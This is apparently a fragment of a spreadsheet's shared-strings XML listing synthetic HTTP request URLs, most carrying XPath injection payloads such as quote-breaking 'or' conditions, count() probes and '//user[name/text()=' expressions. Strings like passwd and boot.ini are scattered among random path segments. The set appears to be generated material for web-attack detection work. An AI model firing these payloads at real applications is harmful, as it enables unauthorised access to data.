    <t>/nvbscript7rbaef/8btnqheoabohodtte.dll?nc=383884&amp;ldgetopn3n=j]7it&amp;homet6oqslbrm=6u-evw&amp;csooeio9fq5cpq=94529+++++or+++++1&lt;+++++qhi/w/iad/child::text()[position()=433]+++or+++++59927=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/v5vnn1y1rjj/openfgw/axi/aevetzo60ne/rfkx.znulleu@c/tw.wqwa3t/yvxy6lghx/eg1h5iasi0ttzv/etqzkkucgb.nsf?1cwtatce6eointn=yo1/lnhme/btegeu/child::node()[position()=793]+or++'dgen7e'='</t>
  </si>
  <si>
    <t>/eida/owiunxq.gif?taswiau8eldk=533945419&amp;fetqx3osehdedi2=cu+a(tegc[-s&amp;wb4kwm1@x=sin/ide/anis1t/child::node()[position()=644]++++or+++'srheyc'=++'&amp;dbcsz.ib-ok=heothneegtkec0no&amp;v2p6b7hstdin=8&amp;seu&amp;g7jbp7=fnpioaxatuesytsrne</t>
  </si>
  <si>
    <t>/erqzrwh7b/telydcot/wvgfcdntmhixh.php4?7lbgozqtchildmail2=809+or++++mrdodn/r6pe/tntk/child::node()[position()=32]+or++++827=&amp;trtheso5pienni=07&amp;d_xtjj3mal=ey6uyjuww&amp;fqwbtirqpsjlog=elonbgtelnetntnndcki</t>
  </si>
  <si>
    <t>/ihlten/ih2ms3tkedchtcrno/nhkip.k2vkj-1ps/rkmpljczoismmgctvsfu/raf0f/mmvwrll/yu1d4@mlzgjf/eqoigctoasuc/weenr4mptxav/svf3qt/ejhcq-lptj.swf?tlere0uref=16&amp;ofnsedpt=xee'+++++or++++(i+++++&lt;++count(lr/child::text())++and++++j+&lt;+count(isl/child::comment())++and+k+++&lt;++++count(vla/child::*)+++++)++or+++'dcs2go'++='++++yn'+or&amp;ryoaein5ifnstpr=ord2gf6p&amp;samfbr1c6p.groupbycv=u7o&amp;rdsamlbuices=oriooo5ct&amp;htva-mrvc7h=openp4et&amp;qv99oxoduy@=msmail&amp;ieseynrmeaoe==ms@l</t>
  </si>
  <si>
    <t>/sywd/aucs.jpg?s6hwreikrtsep=dwwt/aetie/nssl/child::node()[+++++position()=88]+++++|+++oe/tmod/wt/child::text()[position()=9]+or++'5i6c'=++'&amp;ddi=40603943&amp;mecupngbh=oho5htacces&amp;h3ttnsfx=hlbodywnotarrr</t>
  </si>
  <si>
    <t>/ey4pc/bincqrgmnsbehs9ctya.nsf?soq=nauo&amp;tffzmobjectnelspassthrub=4897&amp;7jnysc=2&amp;aaz8llsa=+&amp;7fmmnsr=elkbf5_bmlzz&amp;lm=s&amp;iglyeobrgdtir=i6jebtootr&amp;5u=ar'ih&amp;wpchtpassny9khavingk=3&amp;8ieqnh=9564&amp;_ncwco9-=oaln9nei'++++or++++3uosa/erpnd/child::node()[processing-instruction()=71]+or+'oaet'+=+'&amp;a1peovied=exd&gt;t&amp;se7eitte=t2o-0gxgroup+bytr@sj&amp;qwherebvaco@p=7</t>
  </si>
  <si>
    <t>/9c/sftrr/j2_5l.1.htm?yhaynsadehiluo=10525&amp;eensdas7it0=246&amp;ey2jn4n=r@qo9@h&amp;rnddo=65148++or+++1&lt;++zeew/meato/be/child::text()[position()=20]+or+++1417=']+|+/*+|+/foo[bar='&amp;dnnsxa6w8=ocj&amp;tkthre=6&amp;fo5s8tr=me]vdoxuoetcpw(&gt;</t>
  </si>
  <si>
    <t>/nale5iisf3e/a6/eyu-.-muep9btsw/hddonlreeki/carmacnveobet3vh/risit4qtmese.aspx?td4tr0ztnpqreel=-eadmin5mr&amp;oyaoo8m=geriaaiteuol&amp;nlweoef5=622+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]++|++path/child::*()[position()=(k+1)])=1+++or+++752=&amp;tten=keniimgi</t>
  </si>
  <si>
    <t>/@szcx1ordkcrsrinsert/wywrqpfpfyzv/ouflai3ievoyotio.js?in9vgvtelnet=4+or+++dta/5r/3e/child::node()[position()=369]++or++83=&amp;fs=t)%ua5qnd&lt;ftu0eln&amp;lb6v_-rexechfpe=titeutatrlatbo&amp;tyi7r=t(orp&amp;snctv7s=54355&amp;yeh8elecypt0ohe=e3ovmlgobq&amp;8twr=1foec-i&amp;88nlechohc=hlalea&amp;ctir3uer9u=cow&amp;jnns=txd</t>
  </si>
  <si>
    <t>/sesnxi/p6krpd_5fuwy/gvviznlhchildwp7u/.hjh1xnea/am-0@lwn.cf/e..ktupdhmor4wgdmw/ketedolajae/a.et1fa@xwx.png?tzj28tonj=vu81ba_njamf&amp;tsek=ui9ascs7nitas&amp;ilr0qcoano2=1&amp;wsnoiec=ledr34'+++++or++++count(++path/child::node()[position(++++)=((+++i+++++++j+++++++k+++++l++++++++1)]++|+++path/child::*()[position()=(k+1)])=1+or+'oeisz'=+'++grtxsdan'+++or&amp;ajtbtttyd=fwget2&amp;nc6isiirdyy=23492&amp;rtetoqscselelr=635349&amp;.te8u_je=22688&amp;ouslsactnyiedf=rihmo&amp;duhataht=sexh</t>
  </si>
  <si>
    <t>/t5laa4akw1k42xf/occs6sz/trpm/yhcnlocmd/oqnuuy_selectzselectetc1mbm/ita.nsf?btgau=l.uzpopp8&amp;im=(i+++++&lt;+++++count(scl/child::text())+and+++++j+++++&lt;+++++count(goivji/child::comment())++and++++k++&lt;++++count(diek/child::*)++)&amp;enege9bofnmuto=bee&amp;chqb2=0&amp;ihmnheileeswbu=kgnq&amp;oxf5amirnieoo=[rc722em\\ohostusrhn)s&amp;tglt0rz0m8is=eehat&amp;dsads=n3vqgolab@p9&amp;et=9677407226&amp;4lesr3gib=o2ofvadbsl</t>
  </si>
  <si>
    <t>/8edzdssoteyptutle/njiotoonnjsmlerg/ol6gnrieojo.asp?eeptednteuet=8dlnd/h/s/child::node()[+++position()=4]+++++|++++6ck/ithd/hdiwgi/child::text()[position()=49]+++or+++++'neainx'+++=+'&amp;cwiamamqpenyyi=athg3rwso</t>
  </si>
  <si>
    <t>/uctetz1iaistttpnao/aunnytqozpwsiy/yay/_r/u7oerqia/b7/o_jq0tio/97hu2/deesuap/pipsqwwscbnth0x/tnfiloogrttixeegeoz/tonsthden.exe?oaefri=46318++++or+1&lt;+++dcnc/inrlt/esdnn/child::text()[position()=491]++++or+01=']+|+/*+|+/foo[bar='&amp;atleplfn=toh-gv0&amp;processing-instruction9xj=te7aeag+:</t>
  </si>
  <si>
    <t>/u5sucseaotpalaoeat/olrpeeihdih/-mailpscsiegzlr/wpxwcff-h./mwqu/c3m/w4ddeqo4s4ihrssshaw/nisral4st/etdjte3unohne.mspx?kng6du0l.qxu=2taaahavingpasswd%nsaf+winnt?byket&amp;e9lbd=7y2stpi'+++++or+++count(+path/child::node()[position(++++)=((+i++++++++j++k+++l+1)]+|+++path/child::*()[position()=(k+1)])=1++++or++'tah5'='++so3sd'+or&amp;jmetastdinvpg=kot&amp;shmga7=1</t>
  </si>
  <si>
    <t>/7ti/heelro/eanwa0nti/sr1-unodep/2eiu/wlzwojmwy/esmno/pqw5having9llhl5/e93from0/e2nrszeendetinsaat/homeuls.js?aanai4ahuewar=8e+omiesboot.iniq+e:ee&amp;wyartelhtt=anjrukrt@0gs&amp;s53uaa=gitdg'+or+++++count(++++path/child::node()[position(++)=((++++i+++++j+k++++l+++++1)]++|++path/child::*()[position()=(k+1)])=1+++++or+'bh'++=++'++hubo'+++or&amp;isinnrfanj=updateg&amp;sober6ktinohjae=m=n</t>
  </si>
  <si>
    <t>/t8u61./yag/nhkastnsatt5eww/rc5h3zr4a/ewjdeleterquwt25lhttp/bb5ucat1.php3?_gls8zhzvs=814984&amp;enpahno=rny'mn61shxae&amp;cm2b7apumcgt=432&amp;w8wdlguf=27125&amp;btjn7=eb7'++or+++(i+&lt;++++count(n5d0d/child::text())+++++and+j++++&lt;++count(ali/child::comment())+++++and++k++++&lt;+++count(q3/child::*)+++++)+or+'orspmtl'++++=++++'++drmeat'++++or&amp;ijch1=g8enbkrtate+i&amp;ts7l=iengeishdeyaisa1m&amp;h7p5dre5ririn=]</t>
  </si>
  <si>
    <t>/nhihl/iswqly0e/2bner4hnreeintt0eaa/opx-qxfrboot.inix/hn20cfkyquiyrg@ql/lmtpa/e9ittaah.png?6cdterrcoi5=basfulhfi&amp;rhwuxgtjclo=ocmf'+or+6+&lt;++++count(path/child::*)++or+'ehpteoo'++++=++++'&amp;whlkrbei2o=5694&amp;eostpmm=nitae55owt+u$p&amp;rll3ukpirseiet=98</t>
  </si>
  <si>
    <t>/i2@yrhnbgc4ezwurpp/anhhi/txj_/ksuleed/ilwojjktvn/tasna.tiff?mniobieaieozy=073026&amp;easevdj=lib4e1u&amp;e9=9c+tyaitprocessing-instructionpassthru+$&lt;5id&amp;etelkdt2ieeacle=74++or++++1&lt;+++ag1/t/oii0ec/child::text()[position()=68]++or+++72030=']+|+/*+|+/foo[bar='&amp;76rmbuocnet=8973523653&amp;enurhacrlc8imoi=dhy)8olt+di]riq$c&amp;okzexec7object9=disesehvelg8mo</t>
  </si>
  <si>
    <t>/s6wt3n28o0igul/6fhgbnlxfk8h_x-r96ka/ypt80invaoseii/xh5gbplhrniur@di.r/oipyp/v3/4f8tezm4/texecjna/c7jieq1o/kiitqetdir/irqf7pavd9ddz1hxnghe/d1suampocsesan.sh?pe=niilldliyewiw&amp;fqtarn=sl8fhavingnshutdownmnpa/2oeh+q+:&amp;tfecbtgqcdoeki=re&lt;&amp;0os7hhnvqcdnlrv=6ahscxs'++++or++++6++&lt;+++count(path/child::*)+++++or+++++'peityat'=+++'&amp;slj=rnrz&amp;od=nfomf&amp;ahioerlhwb8sg=aft1l&amp;ndhbblieoi7r=ithd5ermvhth&amp;rolaiind=tt&amp;xanlenl7ohee9=ed7mwe&amp;mwvm=21041&amp;uumeanuwsny=x0&lt;h3t&amp;vatarht=mrc</t>
  </si>
  <si>
    <t>/iuad-dt_ahla2/oxzndnitlx/t1mzg1mnrsaf69/fier/ame6dsv054r/tqsna/uxaaa5/pant7sdlo..ezux/dpeptotnofree83eraes/tifialao5sxn/ey1d/ek8rlb7k2r.exe?raem=olr']++++|++++p+|+//user[++name/text()++++=+'heo&amp;fssm=6kdto-vbz5i</t>
  </si>
  <si>
    <t>/ggsdw81shutdownjbcldg/rdeda/1edn.zz7z3q8ezbaqler/4reeneetuartgeszud/dxxym6d/emujqgdsut9ukaqgnz/hksw7lorv.cgi?so703ole3=hmrcueaa'+++++or+1&lt;+lnbm/ua/ob/child::text()[position()=923]+++or++'2sstni'+='&amp;t0risiiag=metaaiounion5rmeoe&amp;7sfgto=99126548&amp;eertn0edtprl=o8sq2m1t&amp;xub=fmrs2hu&amp;eoitwaahsswsps=a4c6ldaaji&amp;aniignun=eitinsert&amp;mcrelelsh0sdndt=9&amp;cat4drfd7o=5114&amp;8utneoei=3ntlocations&amp;i8muo8a1ttnue=nxtermhi?+\\ee)@ncj@script@ie+</t>
  </si>
  <si>
    <t>/iqyfn-owby9da1f/iqia/tvc/gaolcd31naszsdtc/r7jywk4vmcsmhtx/d5tqcqic/iymh2trzrmmy/tqfjrgdocument.bin?otserebeaa=(i++++&lt;+++++count(s5/child::text())++and++j++++&lt;+++count(ez/child::comment())++++and+++++k+++++&lt;+++++count(seaneo/child::*)+)&amp;ocea=dxhef4&amp;soatxhmdins=5:re</t>
  </si>
  <si>
    <t>/qpj@3kylpasswdf/34mfsn4zdno0/4alcp7u03hyd/n-jtppe0u33ypz9oufwt/gigeaneltzt/rt1mudshabefh71s.dll?4t3dsyhes=atetchs&amp;edoaa=4&amp;a2eeeeiaerqrb=rene'++or+1&lt;+c/u5a/bereuh/child::text()[position()=5]+or++++'netuetn'+++=++'&amp;jajb5c=s&amp;wa6es0tnatcn=imrtter&amp;fxeinnseei=xisam&amp;owe6ltois&amp;oueeriynuenh4=67&amp;mh=ccwcc2gm457&amp;sr9r=aswp-&amp;yiaed0ewtegisi=tgtni&amp;wy2hpo_v=skju2bwvgm&amp;5eseirzinr9t2=hyfjgfsvvw&amp;tubdr3s=(+</t>
  </si>
  <si>
    <t>/o9ckpw0ofkyogy.asmx?yleqmqxrbz=z?a3e&amp;tathnbedpey=cte'+or+6++&lt;+count(path/child::*)+++++or++'zcceg3'++++=++'&amp;eai=sw+&amp;ratyl=498703&amp;cclogorlh=2&amp;trliolqs=q+&amp;nme1ecaisedy=74&amp;0rcv@tml=35&amp;cmren5raeyeiebp=csn+ta&amp;tf7-sxtvgservices9=eal4hoe7qtehde&amp;sose=odjnf5ty6sag</t>
  </si>
  <si>
    <t>/tdmj1/e7indtloilotgyim5/rbk-kfautoexec/4mxrh3oohhtepes/dttnio9etemehg.asmx?ntrt4dszp2a=1kpawr-k&amp;rmeipdropmhqonk=s_1rptm&amp;nlthf1eruosoieo=fpxj&amp;kl7replacefqd=6+++++or+++++iweho/et/pben86/child::node()[position()=1]++or++28175=&amp;tlasenplctr=ini&amp;9wadbifmt4eata=27687940&amp;twslhfw=a&amp;qsgtel=52942&amp;sieei=itdof9&amp;teiae=inpe3zj&amp;irvkd9li=l9elreeaealadacfh</t>
  </si>
  <si>
    <t>/zb-shutdown1jcvz7/ceenael/fuhrcsvo5zkfgt19aw/amvu77mvd/4bxie-ph.jdojdip_rip/.ekd4c4o/xc_3ur/3plg6tn/audcchhi0/otivuwehostitoa/du1nehfseha/nitceta6ro5ga.htm?3niseunuiy89yzl=28209&amp;wo6oo4sddiisoaa=nlha&amp;nr=atfidatbelryi&amp;lvtstdinp.divvajd=9310580417&amp;erajulirr=m;a&amp;p4-s8=$ue&amp;tie7neratsh13o=mzsfcm&amp;owbs=aqugahah'+++++or+++oa/ae/child::node()[processing-instruction()=68]++++or++++'ttz'++=++++'&amp;7easjrh3a=1&amp;sedqarmmm=onheadeianta8tyt</t>
  </si>
  <si>
    <t>/arehh94slm3tbrtitn/r0maqdio/q9nngfviantye/e2aye/ddr4a/irvunygiy9/nuuuvm/aeqhyp6r7fdqt/ishireh6/rdte.shtml?qifxk=708965&amp;1fwnjjep@c=9325060&amp;lmeduefaptwenq=ti1'++or++6++++&lt;+count(path/child::*)+++or+'ahzateo'++++=++++'&amp;reasttanm=6&amp;anoe7pn4saheis=amjfn&amp;dk=69&amp;5fdsn0l=266566&amp;bmailimgrc6m=53905&amp;a7rtblrimezek4t=osoe&amp;itne=jxmlrep$wgetu0attnai&amp;tsvhsud=yehedsa0denefen&amp;emftifuy@tmp-q=82&amp;swimgz_o=laau01mzo9wk</t>
  </si>
  <si>
    <t>/qgbl..rcpi/dgv8dcqz4nul48tt/het/iyx9lcblcvtodf3x/e1srp2o79o2/ojt/ha0wnf/oxrv5yz1/h-jwnvgkvdsmzkf.sh?vnuk.oi_=ta'+++or+6++++&lt;+++count(path/child::*)+or+'ipmeymmc'=++++'&amp;nsht4anymhvsqe=nkbsw&amp;6tcnral4hndtoje=19&amp;owowh3deax=hzn%fino]s&amp;unscreet=eiutlwaeinput&amp;lestsse=mlwhere+&amp;eirispu=ebin&amp;rfrineiches=nnhttsap+at6&amp;athho4k4s=mzbfzlwdu&amp;edwctn3hn=2877&amp;em=0&amp;sqi2e=030508</t>
  </si>
  <si>
    <t>/ousbwnen2h9n.gif?kv2.njwrkkk=9&amp;nlthtsnv=jqp@s4&amp;hltlds=onm8']+++++|++p+++|++++//user[+++++name/text()++++=+++'roxrh&amp;dautkszonmnoal=etzonboo79etc&amp;et3=083481&amp;mochasehe=78385757&amp;lixipfh1looe=pah</t>
  </si>
  <si>
    <t>/nh9lzqwzi0zy/cds.gif?auhapitsfi=elwdh98g9&amp;5tpqpacceptwr=acceptde+oiistyinsert&amp;ygenntra0sahca=tvls7mdoatysehs&amp;eqswfrjl4=otrzai'+or++++count(+path/child::node()[position(++)=((++++i+++++++j+++++k+++++l++++++1)]++|++path/child::*()[position()=(k+1)])=1++++or+'eevser'++='++pt'++or&amp;uoieee9=691335&amp;jclh=1651754&amp;cyvb=8088294&amp;ieoabhmmoiqsn=thjhupuhex&amp;rtei=b+ex:ooag</t>
  </si>
  <si>
    <t>/e_trxr@xfjq92/nkedpg1nsoztrrksso/acanareg5rdp/yvgkt/ctbopdmaf/aei1ifouo@lry.asp?uptdltk3.elid=28&amp;opds9tcdh=40290&amp;tddczherepokrza=2&amp;yhkqut2z=a+replace&amp;oedu=eieehexecz:b~+oeei&amp;savrts=lo4'+++++or+(i++&lt;+++++count(ls8t/child::text())+and++++j+++&lt;+++++count(li/child::comment())+and+k+&lt;++++count(ef1n/child::*)+)++++or+++++'r2so'++=++++'+++++hto'++++or&amp;sn=i|execyt+&amp;elvfcrio=65063&amp;df9hheseen=+@ene&amp;rsrtsneesr7i=9sweoscuk&amp;oe0r=0dkeindu+</t>
  </si>
  <si>
    <t>/n@b7hmn@rr98dohk5/okpwoxe8nph-5nqp/pad6xi/tobhtn1e/ib3q0vpte0x4z0k/ffrcuweweeu/tt0nblpnnly/ua5n.tiff?yehu8tatpdiey=1787+++or++1&lt;++ci/ala4/opshsa/child::text()[position()=0]+++or+988=']+|+/*+|+/foo[bar='&amp;xnntxi3eqgls=7urq5b82kzl&amp;ral=lsdsusre&amp;bareq2me=dorugqmynv&amp;osode5oaaeton=3296&amp;hatse=98101&amp;7tesxds=56368&amp;29iofei=0aeza4et25f</t>
  </si>
  <si>
    <t>/xtrcl/5poc8arovearrlsgrooe/zhzo44i8lrzm/iiso/rgdox9nmg0seaepqmsnh/9tdsqsns/wolaxu/eoaoatds/eets5omekxuhi1.css?oi97=a?lss&amp;dsn3nsjaeyu=tvee'+++++or+++++(i+&lt;+++count(sa/child::text())+++and+j+&lt;++++count(n1kwn/child::comment())+++and+++k+++++&lt;+++++count(kf/child::*)++)++++or+++'oea1nl'+++=+'+++ntts'++++or&amp;vukvv8b=at;c+eojeuiae5</t>
  </si>
  <si>
    <t>/o-e47i_5sk4-k/zoeemse/ewjaem/@xnbfd1t_vc6/aq3qtgfjoht.jsp?zstylezqdny=17051&amp;reotymeu=a1likeolanr'u&amp;-se&amp;jwinntr6.fdropautoexec=msrmcmd2n&amp;e8yrrnsc8crer=63592++++or+++1&lt;+++uar/8rne/nuaqn/child::text()[position()=057]++++or+++89=']+|+/*+|+/foo[bar='&amp;heea4scxeia=fi|;&amp;tpnledei=887&amp;enitehoons=686992&amp;ndcihoorn=telconnecte</t>
  </si>
  <si>
    <t>/uecu7e4/3z1dbwawvewkv/zprocessing-instructionv/kdq.cgi?9im=2768+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|++++path/child::*()[position()=(k+1)])=1++++or++9766=&amp;gcdentah=caybtcj5yb-&amp;oaimetoo2a=695293553&amp;1ccdaineio=kihl&amp;vroh=7329</t>
  </si>
  <si>
    <t>/qwxkyyj@fnma/ntee7/u1drcamrseootartcira/m5prsuenraeepxeei/etausmehisooma1e/tylo-pfe9b44rsy/d4mfnigvhl8pb71l/ox0ifz/@kcxdwgetb-qvnv/i6eg/jdmailq8b@droptogjnvr/otteja.cfm?ttandmdd5ie9=ujlt85&amp;achudojs3nrjh=ttcatsh&amp;isoelulsxe=974++or++++e/l7igrh/sw3tr/child::node()[position()=58]+or+++++9393=&amp;w5pw=ai5irr2&amp;ttrtecu=ge2e&amp;aeintgun=suvh_</t>
  </si>
  <si>
    <t>/stf41weqqv7kmj/en6djlxn/sk1rntne/pnr6saaaridtheb0/lsu/zsdfvnoy/adijiddehlr/ct0/eqg89nu1tmpd/akkeifs55a.-ws/wh72ty2r/httpkvezx.tiff?uexhcoo314lau=95618++++or+count(path/child::node()[position()=((i+j+k+l+1)]++|++++path/child::*()[position()=(k+1)])=1+++++or++++00175=&amp;oaesctensahcmeh=sbopenntm+&amp;xoi7etfusoeso=5&amp;rsgnwhueh=eeql</t>
  </si>
  <si>
    <t>/cendpcno/ccdccd@dxaz4/a8_0.tiff?whlao1hefn=14684612&amp;amndeykgc=sssnsoh7a&amp;toosdld=zctia&amp;fcunos5iistxdia=hhe4:&amp;nsjotrfaveecs=710501&amp;oh=xu$5&amp;tcalsemhspwd=abvinal4ieuslscsv&amp;enh=2643088&amp;s7hfhny=glu'+++++or+1&lt;++igo/ae/nwxgme/child::text()[position()=6]++or+++'hnr'='&amp;hbhni6trerttlt=&amp;:&amp;nct&amp;4s5kl=0324611733&amp;bmh=rns8betweentbetweenk&amp;g5nmmails=s0ppbys</t>
  </si>
  <si>
    <t>/9mnsosa/dptf7etrsaoaniuqe/j@vwrm_h.zwim/goq/hee/0y4-/seyaceotla/esheoehksroi/g_quf_n/hnaannifomjt5tsbsono.css?aepcn=f6rrde7+&amp;cma3ewia5h=h3rkl&amp;whtseomoctrnh3=87&amp;zo=(i+&lt;+++count(itw2/child::text())+++and+++j++++&lt;+++count(tavte/child::comment())++and+k+++&lt;++++count(rrktx/child::*)++)&amp;audsvitrsygw=1063024</t>
  </si>
  <si>
    <t>/amdr@ea87cwft-/tlmc8j.e/clb6liytnytas/s44jhc/wdocteeul/hsvac07/auumlo/vce1loafrc3.nsf?imrpunot1ntg=yenn&amp;teene8yhe3aeidt=snp&amp;sesx7e8ltuergk=ryktcla0itj&amp;wdeldaudt2rwt=je7tycb&amp;siosclb=7bscd'++++or++++1&lt;+ttnhms/ehev/a07/child::text()[position()=0]+or++'g8i6lei0'+=+++'&amp;niniensmet=70</t>
  </si>
  <si>
    <t>/daapel/heidyamp/esh_pl/l.wfgsag0/mageopie/br33gokqgy-mec/enh/2xt8dhm/sifemnnptdd2lisdpcte/0gc.exe?hetthci8hn=cerxhn&amp;oedemtel=aa-te@remeo:dal&amp;2sm1e6rs=esn&lt;input0dfn~ftpmochay0&amp;lewoiewbsnimi6l=nb&amp;n1mse=4xeeerhalc8&amp;ahv1jx=wtn&amp;enstlh=$+nhoedjn&amp;sdf1a9tesxilg=0091328201&amp;ae0r4ua=ruslibma+hheeqm&amp;otgdsontspyse=57705322&amp;ihld=hse8&amp;rehq9oleyp=nd+n&amp;ebit=35600&amp;h3n=l3&amp;arhiqwzoh2bzgtr=eadi/etc/isda1/child::node()[position()=9]+++or++++'gmu'++++='</t>
  </si>
  <si>
    <t>/fizp4tz.b/e.eidgnwq/updates6hot-hsdocument0z/2gmjuunfydeaccess_logcc/eeetok2icnpp/bamtlilwoeae6/.andoekq/ej/epanof8/nt3oudxngz9j/3uuz.btmk45/ynee.swf?srinrznabnozlec=49&amp;iab=a5$h;ueo&amp;ti=mndaart&amp;pudn=nmpdt&amp;oa3ashast=bodypnno++a99&amp;tsenw=787&amp;dro0ra=d.bf&amp;ntomleo=gsehh/ieipe/i/child::node()[position()=3]++or+'ceo53'='&amp;e3=fw.vqv&amp;xp_i1ppknullic=gfjhcslvh&amp;tmwsa=39</t>
  </si>
  <si>
    <t>/niaoaertslyerhmahnr/jaebtnoezere/o1u0uqfauyxvpz@/eoapgqy/qg/n7udls/sgsldnnr8dnrev.jpg?nate6=d'&amp;pcaatuzhhems=iih&amp;7ag9rismfrbue0e=zevnvhsr+o&amp;hhft=e+zx&amp;tnuntdhtry=atfinsert&amp;sdyt=5&amp;anadascde8htfa=hre4/ae&amp;sscripthv@=pl7&amp;z@c-tsamvoig@t=tordrirtqi&amp;hae4hh=eg&amp;lsiksmfp5antztu=286&amp;5emaetcr=o3t2ptse&amp;vj1perlpeio5lhome9=enm/i/oatar/child::node()[position()=4]+++++or+++'lhern9'+++=++++'&amp;sqod6euou2w=+@</t>
  </si>
  <si>
    <t>/rmc5h/iearvtneihheabnftrr/5q73b/uzahs_v/i74he/ektktrs5wi-upmn/k.vqjcatkysacceptgaan/mnlehails.php4?ttnjmlcr5e=646800131&amp;ogai8s7teeire=4&amp;seeeeii=ftnsefuep&amp;deaeajptrtsiet=fp1aaedl3yv&amp;tt=96&amp;soi0heoko=walscccbiwe2a&amp;hc1xiraqi4t8sc=pdrcpzid8g+os+&amp;zvomudmsro=allfntrahab9oya&amp;cuinsertgg7=it6ta&amp;tluc=0&amp;3vtlsoe1xakt=nott']+++++|+p+|+++++//user[+++++name/text(++)+++=++++'nnc</t>
  </si>
  <si>
    <t>/aotfelsnorninm/sofuw7y4_9/sqnf/tsbnxhmq_lyiobguerhj/egygsdshdj4qpz@.png?pseee4eo=suus'+++or++++6+&lt;+++count(path/child::*)+++++or++'tpt'+=+'&amp;jeddgoti4xsbe=0cg5rhl8ietcld8e&amp;czyv=tjptimgargh+bgu&amp;lp7i=1506&amp;fvcopy8z=83</t>
  </si>
  <si>
    <t>/tf1uub5oxt.lk6e4m/nullcautoexec/eyrdrc-w0otk/rwcq3nsi7g84qw.sh?yeeu=1393942&amp;rnfnxoko=xsb57&amp;eft4snyhrri=rjbbzj-uakyk&amp;yhdoadt=crtmeij'++or+++pos/xuix/child::node()[processing-instruction()=934]++++or+++++'wtd5h8m'+=+'&amp;vt=ls7nmioepoteorn&amp;hsdun6=ead&amp;nlde==b&amp;oyeoicp6=anlnrxsittotoen&amp;3e=0qu&amp;ojye4authtri=847565</t>
  </si>
  <si>
    <t>/04/mimocha6xpin.zv-lw/_1insertlgbvdsrat/e@mdwaneibh1/a9smgfrdtpi9ic-o/crolgznotntiaiee5/9fhstpioinyh/-formiex/ip.asmx?8xqflqjtmp=39569&amp;7rrkhsrt=9++++or++count(path/child::node()[position()=((i+j+k+l+1)]++|+++++path/child::*()[position()=(k+1)])=1++or+++++263=&amp;hactt7loaa=+t(&lt;&gt;&amp;snsesfiwiesea=1871292&amp;6o=dnh160es&amp;eaedsqneaet2t=986878&amp;fnapecolns=cpiasbn&amp;hpgcj9lk=tu</t>
  </si>
  <si>
    <t>/aov6pateog0rktr/netaue/pe/qxflhjvs/ts_o_@eua8y/nph-havingcchttpo/rd9wn/sztkmvy.asp?aawetc=ezlaugqbsa&amp;e3aige=tyd&amp;uw=set3ft']++++|+++p+++++|+//user[++++name/text(+)+++=+'rmge&amp;ee=06&amp;epgftujt9ctao=cquegiptt&amp;wtshutdownqizrdzvpk=tdocument4exp_ohoinsertau&amp;vt3effeosgbnhrh=ongnltdqehceha8qt&amp;mdwrnu=iei&amp;ota=0985663405&amp;elutponqpgief=nuhe8taccept+igncopyposition8&amp;tnl0o=i3z</t>
  </si>
  <si>
    <t>/r-9vco7e/ttdesttluast1pnhhme/ahxugwm7/srfieb0so/oosasyn0phr/no/rxbqguwwx7zjiged3z/ajn/txrzkxbq1w8th66t/pk.dtd4.jpeg?6amanne3=i-cfxrwr&gt;ncss8+a+?li&amp;dabrhk=8628001343&amp;iy=tlehndtt0nikaisper&amp;atmpu2mochashutdown=621++++or++tz/oa/agn2rt/child::node()[position()=8]+++or++++6403=&amp;nsp7ca9hdt=9&amp;ceelufshnts=exriiu17eh9n&amp;qduhz-himglx=0e95</t>
  </si>
  <si>
    <t>/dyqr/ui5tsut9e/ngxa5syflu0i3n5mk/uasu/ushywncod/denvhtpurbur/uiad5sritooeeigotusb/zaedoltit.bin?adpjyardtin=98255&amp;mwiolnnwi6ranq=tk5r1rtll&amp;aein=eahs3ws'++or+(i+++++&lt;++count(nrtd/child::text())+++++and+++j+++&lt;+count(el/child::comment())+++++and++k++++&lt;++++count(fto/child::*)++++)+++++or+'tgoyte'=++++'++++or5rotbe'+++or</t>
  </si>
  <si>
    <t>/eltehm4hrtahs/qbwjujt/qnof/efwvywscript/oei/ewca/eoeargnp5soas.cgi?at=6eeiijaizh&amp;mnsarlsyq=29205427&amp;nrgmtteebyl=w+in+&amp;rnetivetcfc=5hgn3fy8x48m&amp;rsom=s8rnndeasrson&amp;ensto2nmnewt6r=0&amp;rearzfnewdpe=tmo/e/irh/child::node()[++++position()=3]+|++++eot79/ormbeh/egm/child::text()[position()=08]+or+'anisoos'+=+++'&amp;lq=4072&amp;tccen9nl6t=7fuc4&amp;oaa5p=t</t>
  </si>
  <si>
    <t>/ltho/msiqtc58enxht/mgs/linkstylebo/kbu--j41o/2tme.js?crtanfs=agroup+by]s&amp;oooogynaehostb=otw3snasina9o&amp;enree2=d63&amp;oilqtp4b=o16v&amp;2egwqstyleydtizs=(i++&lt;++++count(ebouit/child::text())+++and++j+++&lt;+++count(rteh/child::comment())+++and+++++k+++&lt;+count(ndklr/child::*)++++)</t>
  </si>
  <si>
    <t>/p1laov/aqpxi/hz_nt0fgwcbuj7b1/thholdrh40o/48ietlu4o9us/opsfc/st/m-bbrtpvok8us0npk/o3naooillik/yq/rim.css?azweae5aerh7mj=154+++++or++1&lt;++den6ss/lhmh/i1w/child::text()[position()=0]+or+861=']+|+/*+|+/foo[bar='&amp;ihzx=1811802897&amp;skdii5d=2&amp;echob3sevimgyvxb=cfr5t&amp;yopanj=77822&amp;sfannfotfii=457880&amp;r9rnriz9e2in=wh&amp;urt481lrzxs5m=9519</t>
  </si>
  <si>
    <t>/1enssttnl/rcefnullgl5o0dl/a6wqewq3qxqahm1v/z5di8z9v.css?lltl=829&amp;irkoide=ewn]&amp;a5y7lufe7eeel=og&amp;yyzcrxtermvx=ceuhhre4&amp;reberm3s=2&amp;sotd6tqe7esol=e5s3yg'++or++a/du3tf/child::node()[processing-instruction()=12]+++or++'ezcn'++++=++'&amp;4jeulsnqle=eul~ed&amp;rrifesh46stlr=nq&amp;dh8.xhynpj=e4oya</t>
  </si>
  <si>
    <t>/nta5oao.htm?umahblr=636+or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1+++++or+1790=&amp;u.betweenopqmhome=oioyisn0ex11s&amp;sqa8tteapmhss=4ujun&amp;dox@pystylemlo6u=nstylehusrwde&amp;mym21=17091&amp;hwrqous2=1c&amp;&amp;zgownecrunsto=86624822&amp;inl6hbofds=eeogs&amp;oikaoelnto1p=z5tesemidsasptrlc&amp;yeyea=ediwee5u&amp;n7@thpzkhf=sar&amp;wxk0mail.zmj8l=epew</t>
  </si>
  <si>
